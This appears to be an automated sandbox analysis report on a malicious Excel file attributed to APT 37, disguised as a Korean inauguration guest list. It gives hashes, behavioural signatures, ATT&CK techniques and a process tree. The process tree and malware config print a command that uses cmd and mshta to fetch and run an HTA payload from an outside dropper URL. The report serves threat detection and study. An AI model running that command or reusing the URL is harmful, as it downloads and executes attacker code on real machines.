Analysis

  • max time kernel
    151s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    21-03-2023 23:12

General

  • Target

    APT 37 Previous Commits 1/(양식) 제20λŒ€ λŒ€ν†΅λ Ή μ·¨μž„μ‹ μž¬μ™Έλ™ν¬ μ°Έμ„μž μΆ”μ²œ λͺ…단(κ΅­λ―Όμ˜νž˜λ‹Ήμ› 000).xls

  • Size

    135KB

  • MD5

    c8df23e698e196f803ace0f50a18944d

  • SHA1

    bf47a34bc092fa81918a387e8f5282f7a7d8a0c4

  • SHA256

    db70f269d62c43bd09580858731853a589e0f32f2d3c915b15cb9f0b4b9f12d2

  • SHA512

    29146eff3ed7d8b6ddbf1736f2e2a2fb90a0cec1fc9f8244763802ef9af36bbf1fdd907eee198fe8d910cd3ae17227ab2d2b9e376d9243bdc549d602182f6ab3

  • SSDEEP

    3072:Fk3hOdsylKlgryzc4bNhZFGzE+cL2knAeQN3QgBzMnNXHM6au7Fei9Yyg4/FQbux:Fk3hOdsylKlgryzc4bNhZF+E+W2knAeX

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://attiferstudio.com/install.bak/sony/6.html

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 32 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\APT 37 Previous Commits 1\(양식) 제20λŒ€ λŒ€ν†΅λ Ή μ·¨μž„μ‹ μž¬μ™Έλ™ν¬ μ°Έμ„μž μΆ”μ²œ λͺ…단(κ΅­λ―Όμ˜νž˜λ‹Ήμ› 000).xls"
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2032
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c mshta http://attiferstudio.com/install.bak/sony/6.html
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1868
      • C:\Windows\SysWOW64\mshta.exe
        mshta http://attiferstudio.com/install.bak/sony/6.html
        3⤵
        • Blocklisted process makes network request
        • Modifies Internet Explorer settings
        PID:644

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2032-54-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/2032-55-0x0000000000440000-0x0000000000540000-memory.dmp
    Filesize

    1024KB

  • memory/2032-56-0x0000000000440000-0x0000000000540000-memory.dmp
    Filesize

    1024KB

  • memory/2032-57-0x0000000000440000-0x0000000000540000-memory.dmp
    Filesize

    1024KB

  • memory/2032-58-0x0000000000440000-0x0000000000540000-memory.dmp
    Filesize

    1024KB

  • memory/2032-61-0x0000000000440000-0x0000000000540000-memory.dmp
    Filesize

    1024KB

  • memory/2032-62-0x0000000000440000-0x0000000000540000-memory.dmp
    Filesize

    1024KB

  • memory/2032-73-0x0000000000440000-0x0000000000540000-memory.dmp
    Filesize

    1024KB